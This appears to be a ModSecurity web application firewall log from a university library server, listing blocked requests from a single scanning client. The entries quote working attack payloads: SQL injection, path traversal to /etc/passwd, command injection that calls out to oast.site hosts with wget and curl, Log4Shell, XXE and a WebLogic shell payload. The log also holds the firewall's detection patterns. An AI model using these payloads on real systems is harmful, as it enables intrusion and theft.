"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "digilib.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAO88BUAAAAF"]
[Tue Aug 29 11:31:23.325258 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAQOv04AAAAw"]
[Tue Aug 29 11:31:24.659933 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlg8r9m4st9h57r3.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQOv1YAAAAw"]
[Tue Aug 29 11:31:25.314728 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlgpkmt3uutdmjk7.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAN@5EoAAAAO"]
[Tue Aug 29 11:31:26.690910 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlgx4pezz818cane.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAQOv10AAAAw"]
[Tue Aug 29 11:31:27.335594 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10n8Co-f0AAAQJWs4AAAAr"]
[Tue Aug 29 11:31:28.704406 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10oMCo-f0AAAQFcSoAAAAn"]
[Tue Aug 29 11:31:29.159153 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAQTKHoAAAA1"]
[Tue Aug 29 11:31:29.444472 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQTKHwAAAA1"]
[Tue Aug 29 11:31:29.524627 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQEGI0AAAAm"]
[Tue Aug 29 11:31:29.548211 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10ocCo-f0AAAPahzMAAAAL"]
[Tue Aug 29 11:31:30.404195 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQFcTAAAAAn"]
[Tue Aug 29 11:31:31.387409 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgw4rpm6smjj1w4.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAP5mJMAAAAM"]
[Tue Aug 29 11:31:32.323303 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAQMrr0AAAAu"]
[Tue Aug 29 11:31:33.537636 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlgerqokx6b1419p.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAQEGJoAAAAm"]
[Tue Aug 29 11:31:33.624431 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAQEGJwAAAAm"]
[Tue Aug 29 11:31:34.400588 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQEGKYAAAAm"]
[Tue Aug 29 11:31:35.377245 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAQlGQgAAAAF"]
[Tue Aug 29 11:31:36.393368 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgszuuj1rh3xjre.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAQKOdEAAAAs"]
[Tue Aug 29 11:31:36.393449 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAQlGQ4AAAAF"]
[Tue Aug 29 11:31:37.343675 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAQJWvIAAAAr"]
[Tue Aug 29 11:31:37.479581 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAANsATwAAAAD"]
[Tue Aug 29 11:31:38.301595 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlg7zz5ef8k46hwm.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAPiBjoAAAAB"]
[Tue Aug 29 11:31:38.497504 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlg7j4ftifx6z5by.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAANsAT8AAAAD"]
[Tue Aug 29 11:31:38.605618 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAQFcTMAAAAn"]
[Tue Aug 29 11:31:39.449195 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlgkfutbbpiknrxc.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAP@M1sAAAAZ"]
[Tue Aug 29 11:31:40.369031 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilib.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAQEGMIAAAAm"]
[Tue Aug 29 11:31:41.723708 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAQMru4AAAAu"]
[Tue Aug 29 11:31:43.339064 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAN@5IcAAAAO"]
[Tue Aug 29 11:31:44.317163 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilib.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAANsAUoAAAAD"]
[Tue Aug 29 11:31:44.317238 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilib.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAANsAUoAAAAD"]
[Tue Aug 29 11:31:44.325235 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAQA-@cAAAAi"]
